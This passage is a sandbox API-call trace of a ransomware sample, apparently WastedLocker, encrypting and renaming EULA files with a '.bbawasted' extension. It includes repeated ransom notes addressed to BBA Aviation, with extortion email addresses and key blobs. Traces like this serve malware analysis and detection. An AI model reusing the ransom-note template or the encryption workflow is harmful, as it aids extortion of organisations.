KEY:\r\n[begin_key]NbPl6Q7LtM23sxCgRyUg/xAMcHWZhYy+nBkQ+uDb0EgxwFVO7izy/Iw9HvgXBHhj\r\nPrqy3G8rd6J/MsXpV+ftkxc8ngwFJb1Si0tTxHoDGKtv5YFN78/tgQVTy/JyO6zy\r\nIttZ/m12wwfTPqfzFmc/1N8N19oS64EYzJvGFwDCtguBlBn+wo0cHQGCoiuOXqv3\r\nAGgHxCFe9Ldt7LZniRIpeMHst36YOP19lPyh6RnNk2dXmKrQT4Pm9LlZTNJMN6Z1\r\n2SOWaIxpOJlgRSDtlIor9Z4MlviKqZrqKRpqKK0lRC4qt17QR15l35EKCoNBxNvh\r\nXg1XZEkY2IdN5amfL01p7tDklurAtOSVsV7ydW3lc1K1UEnXGLCLob7CbMbGnLNF\r\nE5x0B9NX/ADVSB/AbZR1fDGf82EtZSho+8ybQmSyrdd6nJYJUNmdITL89Gmg3iln\r\nuIVBlqzLEpKswGphckDGhLAj1XVBln5D/7r2YavH4XwRC+rAthOghr6AGunIN7n7\r\nIN2M/efilUMKIbZ+iuITrKALtXNW/RUvcGw3xIEub7rGw5TT2k1IXfM4MbtAdPto\r\nv86XSu2IeikMHcULThurbeTRxcUEfqptUZomeNV3UuRx+dXN29D2ej6UsITCHkcx\r\ntK9SRrYMk3TFGD7uqN/ZmygSPoAk6mgr3l4Mkb4DJvg=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.309] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0237.310] SetEndOfFile (hFile=0x28c) returned 1 [0237.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.313] CloseHandle (hObject=0x28c) returned 1 [0237.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0237.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1498 | out: hHeap=0x660000) returned 1 [0237.313] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6350) returned 1 [0237.314] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0237.314] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0237.314] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm") returned 56 [0237.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0237.314] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.314] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0237.315] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.315] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0237.315] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0237.315] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.317] SetEndOfFile (hFile=0x28c) returned 1 [0237.317] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.317] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm.bbawasted")) returned 1 [0237.434] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0237.434] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0237.434] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10698 [0237.434] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10698) returned 0x5f0000 [0237.434] CloseHandle (hObject=0x280) returned 1 [0237.438] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.439] CloseHandle (hObject=0x27c) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0237.439] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0237.440] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0237.440] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0237.440] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0237.440] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0237.441] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0237.452] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AOxdyo3MaMklujmuYyWxCU2dZuolSC4MqcwDvG3MzcgVNGyWGruUfrBunBNAk10j\r\nBUkgnSGUYsiMrgMpoZ3PekLrTlVc7s0N+Ro6h5X1rLFBysbJESOPMPgoBMoW5Wv2\r\n+uam8ysZ7QR81Etz0sbQF7qO9Vlu3P5gRLb2uoRbIWru4XpnRd8VqhDEyEbtSTV8\r\n4qPp9CAhW1fzQTJX890lsJZFJ5ACTfEJF0wt1HxDGCmvKrXm58ux2P/nKI2altBs\r\n9sCl//GhSSwpcsvF0NmBgX62KObw8BNFr/H5simnYR1Do5pGLLuF28/6ciJWy66I\r\nt/SdgHTuCw0OKJtCrEsyD46nAGIqYsGKsqrPQ+8ReWGZAnqCEXWZzd1t+T8pJAYt\r\nbGKtAmBg/Y/szJY4pInJ9VtKtWPtOvgxc3R5NeDUTIrQnWtl6lrtRoKQrnrSLcX0\r\nJ8H3+BKhy/KAsQuEabPEnSDAMdqma/BZEoIG4YRiUpChpgvcCpIyfITZzMET3JdV\r\ndSDksw3vCpggjbLq02udCXnjguL2uyRkz2QHVFdNkR3XhUVMtNLT5tUZNjyrzuAC\r\n8eeF+RdNgtefXw4lAVHYwG/ENlBQK//JuQT+RLaxX2Om8QBui2pc9FveQTMehKK7\r\n7oZErwCLr+tlpyHPpo4+EzqPbyuRUh2b+uzKhCDbjdf=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.452] WriteFile (in: hFile=0x28c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0237.452] SetEndOfFile (hFile=0x28c) returned 1 [0237.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0237.455] CloseHandle (hObject=0x28c) returned 1 [0237.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0237.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1708 | out: hHeap=0x660000) returned 1 [0237.456] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6d68) returned 1 [0237.456] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0237.456] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0237.456] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm") returned 56 [0237.456] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0237.457] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.457] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0237.457] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0237.457] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0237.457] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0237.457] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0237.460] WriteFile (in: hFile=0x28c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.462] SetEndOfFile (hFile=0x28c) returned 1 [0237.462] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.462] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0237.462] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm.bbawasted")) returned 1 [0237.463] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0237.463] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0237.463] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10ac4 [0237.463] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10ac4) returned 0x5f0000 [0237.464] CloseHandle (hObject=0x27c) returned 1 [0237.603] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.605] CloseHandle (hObject=0x280) returned 1 [0237.635] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a9fc8 [0237.635] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6818) returned 1 [0237.635] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6aa010 | out: pbBuffer=0x6aa010) returned 1 [0237.636] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0237.636] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0237.637] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0237.637] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0237.649] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9fc8 | out: hHeap=0x660000) returned 1 [0237.649] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.649] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tGu9/YO9nfC6NJRolo56cWauzwIaHjXTUlVULQFwWmNxjsXQX5yKZLSgJnDubfb9\r\nhEGwTM0ergfqqSFywdTYWZSI11SXqjqALIDUbuXOTK7VwzLDgdmLCtpqo6ijZqmf\r\nFBIXoBtnP/VjpBe6IIevzsTK8KTNfsFgsY0L5+0WEpE5/P9FaBdWgAcJAK1rDJb3\r\nf0tBpFOB0gkZ85kzgNxBf24nKEpZWDppTKvbOuQKxLesSUp+Pb7sJgvFVxlX+CDs\r\nFhrSjhBN+Ap7NLnQCaYRST/xlxDSZys8wRCYoMOTQ1IkQkNUWiWkt4D91CFSyuNI\r\nJGB0zGfLKguyNX4syYOhwpkzMUSefXvCmduOX/wQzM3llWRjl6pzG9NWY5ccy6AS\r\n4aQQVOHtReLEfRxRs+0ReeblXLnsGjnNXJ4dxITZDQGfr6MVZqjrOnoDRjuaiZgZ\r\nfYiIlwMoYU1FYpVWWv+ZNWhrqgK2MwuXHAfuRhpZ0LNKqBUGNI3ZDyrwACzZox7b\r\n7jZZCb9aIXkc/8OZViWDbRMNswzzflefzWA8UIuhafVd+pd6gKgtJ6MqL6LJgCE3\r\nGuZK/5OeuRXG3nBo/l5brp2hnsslIeQEg1sJcMLg7zblNIfrjd1JzGYuDtUDlUY5\r\nIy0A+kJ6FTkoXuoyd8zJPsAFqNrkifkOIRUbHdRulht=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.649] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0237.649] SetEndOfFile (hFile=0x28c) returned 1 [0237.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.652] CloseHandle (hObject=0x28c) returned 1 [0237.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0237.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2268 | out: hHeap=0x660000) returned 1 [0237.653] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0237.653] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0237.653] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0237.653] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm") returned 56 [0237.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0237.654] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.654] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0237.654] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.654] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0237.654] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0237.726] WriteFile (in: hFile=0x280, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.727] SetEndOfFile (hFile=0x280) returned 1 [0237.728] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.728] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.728] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm.bbawasted")) returned 1 [0237.730] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0237.731] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0237.731] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x454cc [0237.731] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x454cc) returned 0x1480000 [0237.731] CloseHandle (hObject=0x294) returned 1 [0237.772] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0237.775] CloseHandle (hObject=0x28c) returned 1 [0237.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa1d0 [0237.775] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0237.776] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6aa218 | out: pbBuffer=0x6aa218) returned 1 [0237.776] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0237.776] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6708) returned 1 [0237.777] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0237.777] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0237.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa1d0 | out: hHeap=0x660000) returned 1 [0237.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.785] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GNBRk6OaGtWnm6pY+dxhQTVwH9rLFsX6cx+XOvuRr2j+RB1Usi5FSMRsowbRg+3Y\r\nRMDZbHMfTbsoa/8WqWhQuewrmkW9E9hDyFeRBFJ29dZ0KEwVVUSQtexWyDPrjCJi\r\nhSpTwI+OisxqmNd6mlW+6LivUdFevev5htET4Fhb5RqcMJxm86f9zdi4f52f2/+s\r\nQGz0V9QumHR28JABu6twb+Hd8ESPVJUSHPqx0wLJ3YE6VdPqr407FrClneQwXt2m\r\nfig0fFzxwLkkxreFABurQf73fzl/xzPZVeNOslrr35iCI1RP3yZrxaSwo2oM1xy+\r\nJ3qD2REJM2DrItELHxcmK/QTThdqgNBVfcbEJthkXs0Han1UYyfQLN8o1TWkG4LE\r\noNHBwZLRhLi0279Mw3ejxUj8wSUxGkCp6WtLumtEDjMSZJARgvzjrSJ2gZ8vGTQf\r\n0F+ZU57FEAZcrORFd2aGm6Wrro21jybx/Ryv+zgoKru1FIkUcXDK0YKbL3ss0VPC\r\nd5QOnv0Y2Ob5IEL+fQoRMtPwaDhQ6CH0RvnIXHnK3vfJ4QQ3kL/dE4WRfr8toGar\r\n18mIP7GkuMxlUsgKjd6BndGAiAXX4vWkolAeD19xs91D1HLagxyyiodw7HF0ykVh\r\noWLeSAe5sZR68GYjLHu3DsJWvCQmDxOVTPFOjcembYW=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.785] WriteFile (in: hFile=0x280, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0237.785] SetEndOfFile (hFile=0x280) returned 1 [0237.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.788] CloseHandle (hObject=0x280) returned 1 [0237.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0237.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c24d8 | out: hHeap=0x660000) returned 1 [0237.788] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0237.789] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0237.789] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0237.789] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm") returned 56 [0237.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 